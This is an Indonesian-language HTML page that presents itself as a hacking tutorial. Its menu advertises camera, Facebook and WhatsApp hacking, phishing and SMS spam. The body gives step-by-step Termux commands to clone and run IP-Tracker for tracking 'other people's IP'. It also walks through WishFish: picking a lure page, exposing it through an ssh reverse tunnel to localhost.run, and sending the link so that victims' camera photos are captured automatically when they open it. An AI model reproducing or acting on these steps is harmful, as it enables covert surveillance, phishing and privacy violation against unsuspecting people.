<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <style type="text/css" media="all">
    * {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  
  body{
    padding: 5px;
    background-color: red;
  }
}
.data{
  background-color:#2b2b2b ;
  height: 860px;
}
    
      .navbar{
	background:rgb(0,0,0);
	margin: 0;
	padding: 22px 30px;
}
 
.logo{
	font-size: 14pt;
	font-weight: bold;
	text-decoration: none;
	color: white;
}
 
.container{
	display: flex;
	justify-content: space-between;
	align-items: center;
}
 
.tombol{
	display: none;
	color: white;
	font-size: 14pt;			
}
 
.tombol:hover{
	cursor: pointer;
}
 
.menu{
	margin: 0;
	display: flex;
	list-style: none;
	padding: 0;			
}
 
.menu li{
	padding-left: 0;
	margin-right: 10px;
}
 
.menu li a{
  background-color:#000000ab;
  border-radius:50px;
	padding:10px;
	color:#c71111ab;
	text-decoration: none;
	display: inline-block;
	color:#ffffff;
}

.menu h1{
  background-color:#ffffffab;
  font-size:200;
  border-radius:50px;
  color:#cb0000;
}

@media screen and (max-width: 768px) {
	.menu {
		display: none;
	}
 
	.menu.aktif{
		display:inline-block;
		position: absolute;
		top: 120px;
		background-color:rgba(83,83,83,0.671, 0.2);
		border-radius: 22px;
		padding: 10px 20px;
		right: 0;
		left: 0;
		backdrop-filter: blur(51px);
		-webkit-backdrop-filter: blur(10px);
	}
 
	.menu.aktif li a{
		padding: 10px;
		display: inline-block !important;
	}
 
	.tombol {
		display: block;
	}
}


    /* Navigation */
    .well{
      color: red;
      font-size: 20px;
    }
    .well span{
      color: #ffffff;
      font-size: 30px;
    }
    
    
    
    
    .box{
      background-color:#ca0808 ;
    }
    
    span {
  font-family: Sans-Serif;
  font-weight: 600;
  color: red;
}

.loading{
  width: 200px;
  height: 28px;
  padding: 1px;
  border: 2px solid black;
  border-radius: 9px;
}

.loading-card{
  width: 100%;
  height: 100%;
  overflow: hidden;
}

.loading-progres{
  width: 100%;
  height: 100%;
  background-color: black;
  border-radius: 9px;
  animation: loading 3s ease-in-out infinite;
}

.menu h1{
  text-align: center;
  color: #fff;
}
.menuh{
  color:#f40f0f;
  padding:8px;
}
.Babhalaman{
  height: 500px;
}
.container1{
  background-color:#fff;
  color:#ffffff94;
  height: auto;
  padding: 15px;
}

h3{
  text-align:center;
}

.Runing{
  color:#ffffff94;
}

.bab p{
  color: #000000;
}
.bab h4{
  color:#000000 ;
  padding: 15px;
}

.menu1 li{
  padding-left: 0;
	margin-right: 10px;
}
 .menu1 li a{
  border-radius:50px;
	padding:10px;
	text-decoration: none;
	display: inline-block;
	color:#ffffff;
 }
 
 .termux p{
   padding: 6px;
 }
 
 .Ipt h2{
   color: #b30000;
   text-align: center;
 }
 
 .Ipt h3{
   color: #000;
   text-align: center;
 }
 
 .kode h5{
   color: #000;
 }
 
 .ban9{
   background-color:#2000f8ac;
 }
 

/*jammmmm*/


	

@keyframes loading {
  0%{
    transform: translateX(-100%);
  }
  100%{
    transform: translateX(0);
  }
}


    </style>
  </head>
   <body>
     		
     		<!--loding-->
      <div class="box">
        <div class="loading">
          <div class="loading-card">
            <div class="loading-progres"></div>
         </div>
         </div>
         </div>
     <!--loding-->
     
    
      <nav class="navbar">
		<div class="container">
      	<a class="well">Well<span>Komm</span></a>
			<ul class="menu">
			  <h1 class="menuh">MENU</h1>
			  <hr class="garis">
				<li><a href="#">Home</a></li>
				<li><a href="Kasir.py">Kasir</a></li>
				<li><a href="#">Produk</a></li>
				<li><a href="#">Layanan</a></li>
				<li><a href="#">Kontak Kami</a></li>
			</ul>
			
			<div class="tombol">
				&#9776;
			</div>
		</div>
	</nav>
	<div class="ban9">
	<div>
	  <marquee scrolldelay="50" class="Runing">RUNNING TEKS DELAY 0,88 DETIK</marquee>
	  <hr>
	</div>
  <div class="Babhalaman">
       <ul class="menu1">
      <li><a href=""># Hack kamera </a></li>
      <li><a href=""># Hack lokasi</a></li>
      <li><a href=""># Hack fb</a></li>
      <li><a href=""># Nambah folower ig</a></li>
      <li><a href=""># Pishing sosial media</a></li>
      <li><a href=""># Spam Sms</a></li>
      <li><a href=""># Tambah view Tiktok</a></li>
      <li><a href="Hackip"># Hack alamat ip</a></li>
      <li><a href=""># sadap wasapa</a></li>
      <li><a href=""># Hack audio</a></li>
    </ul>
    
    
    </div>
    </div>
 <hr>
 <h3>BAHAN YANG DI PERLUKAN</h3>
 <hr>
  
 <div class="container1">
   <div class="bab">
     <p>untuk memulai peretasan kita perlu men <u>download</u> bahah bahan yang di perlukan<br></p>
     <h4>Untuk Bahan Nya ada di bawah ini</h4>
     <p>bahan yang di perlukan</p>
     <div class="termux">
       <hr>
       <p>download <u>Termux</u></p>
     <p><a href="https://wiki.termux.com/">•TERMUK</a></p>
     <p>download <u>zarchiver</u></p>
     <p><a href="https://www.zarchiver.pro/">•zarchiver</a></p>
     <p>download <u>MT-manager</u></p>
     <p><a href="https://apkpure.net/mt-manager/bin.mt.plus/download">•MT-manager</a></p>
     <hr>
     <h4>Itulah bahan yang di perlukan</h4>
     <div>
       <p>Setelah bahan yang di butuhkan sudah ter install <u>Buka aplikasi Termux</u></p>
       <hr>
       <div class="Ipt">
       <h2> Berikut ini berbagay cara yang bisa di coba</h2>
       <hr>
       <h3 id="Hackip"> Hack iP-Tracker termux
       </h3>
       <hr>
       <p>Oke sebelum di mulay <u>buka dulu apk temux nya</u></p>
       <p>dan masuk kan perintah di bawah ini</p>
       <div class="kode">
       <p>install data termux contoh dibawah</p>
       <h5># apt update</h5>
       <h5># apt upgrade</h5>
       <h5># pkg update && pkg upgrade</h5>
       <h5># pkg install python</h5>
       <h5># pkg install python2</h5>
       <h5># pkg install python3</h5>
       <h5># pkg install git</h5>
       <h5># pip install rekuests</h5>
       <h5># pkg install bash</h5>
       <p>kalow udah masuk kan kode di bawah ini sapai install nya selesai</p>
       <h5># git clone https://github.com/KasRoudra/IP-Tracker</h5>
       <p>Kalow udah masukan kode ini </p>
       <h5># ls</h5>
       <p>Kalow udah masukan kode ini</p>
       <h5># cd IP-Tracker</h5>
       <p>Kalow udah masukan kode ini</p>
       <h5># bash ip.sh</h5>
       <hr>
       <p>itulah script termux hack ip orang lain </p>
       <p>namun belum selesai masih ada berbagai tahapan lagi </p>
       <hr>
       
       <div>
       <h3>Hack kamera termux</h3>
       <hr>
       <p>Oke sebleum di mulai seperti biasa <u>buka aplikasi termux nya</u></p>
       <p>berikut ini adallah script termux hack <u>Kamera</u> yang bisa kamu jalan kan</p>
       <p>buka aplikasi termux dan masuk kan script di bawah ini</p>
       <p>Masukkan perintah ini</p>
       <h5># pkg update && pkg upgrade</h5>
       <p>kalow udah masuk kan yang ini</p>
       <h5># apt install php wget git</h5>
       <p>kalow ada pemilihan:n/y = pilih, .y</p>
       <p>kalow udah masuk perintah ini</p>
       <h5># git clone https://github.com/kinghacker0/WishFish.git</h5>
       <p>kalow udah ketik .ls</p>
       <h5># ls</h5>
       <p>kalow udah ketik ini</p>
       <h5># cd WishFish</h5>
       <p>lalu ketik .ls</p>
       <h5># ls</h5>
       <p>kalow udah ketik..</p>
       <h5># bash wishfish.sh</h5>
       <p>kalow udah nan ti akan ada pilihan contoh<br>
       [01]Ngrok..<br>
       [02]Serveo.net</p>
       <p>maka pilih nomor 2</p>
       <p>kalou udah daptar ngrok pilih aja angka 1</p>
       <p>setlah itu akan mun cul kembali pilihan<br>
       contoh<br>
       [01] Festival Wishing<br>
       [02] Live Youtube TV<br>
       [03] Online Meeting</p><br>
       <p>pilih aja yang nomor .1</p>
       <p>Masukkan nama festival: bebas</p>
       <p>Choose subdomain? (Default: [Y/n] ): pilih y</p>
       <p>Subdomain: (Default: hey!31470 ): 3333</p>
       <p>setelah itu buat halaman baru dengan cara geser sisi kiri atas termux</p>
       <p>masukkan kode ini</p>
       <h5># ssh -R 80:localhost:3333 nokey@localhost.run</h5>
       <p>nanti akan keluar link dan bagikan link ter sebut ke pada orang lain <br>
       kalou orang lain meng buka nya maka akan oto matis ke ambil poto nyaa</p>
       <p>kalow udah ketik <br>
       ctrl c <br>
       kalow udah masuk kan perintah</p>
       <h5># mv * /data/data/com.termux/files/home/storage/shared</h5>
       <p>buka porder hp kamu maka si poto nya ada di situ</p>
       </div>
       
       </div>
       </div>
       
       <h2></h2>
     </div>
     </div>
   </div>
 </div>
 
        <!--Navbar-->

        <!--Java-->
        
        <script type="text/javascript">
		// deklarasi tombol dan menu
		const tombol = document.querySelector('.tombol');
		const menu = document.querySelector('.menu');
 
		// membuat event click
		// pada saat tombol di click, tambahkan class aktif pada class menu
		// saat diklik lagi, maka class aktif dihilangkan dari class menu (toggle)
		tombol.addEventListener('click', () => {
			menu.classList.toggle('aktif');
		});
</script>
  </body>
</html>